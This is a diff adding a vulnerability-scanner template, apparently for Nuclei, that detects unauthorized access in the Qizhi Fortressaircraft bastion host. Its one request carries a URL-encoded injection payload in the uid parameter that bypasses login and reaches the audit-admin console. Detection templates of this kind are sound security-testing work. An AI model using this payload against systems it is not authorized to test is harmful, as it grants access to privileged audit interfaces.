diff --git a/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml b/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml new file mode 100644 index 0000000000..eb8e77795c --- /dev/null +++ b/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml @@ -0,0 +1,27 @@ +id: qizhi-fortressaircraft-unauth + +info: + name: Qizhi Fortressaircraft Unauthorized Acccess + author: ritikchaddha + severity: high + reference: https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw + tags: qizhi,fortressaircraft,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "错误的id" + - "审计管理员" + - "事件审计" + condition: and + + - type: status + status: + - 200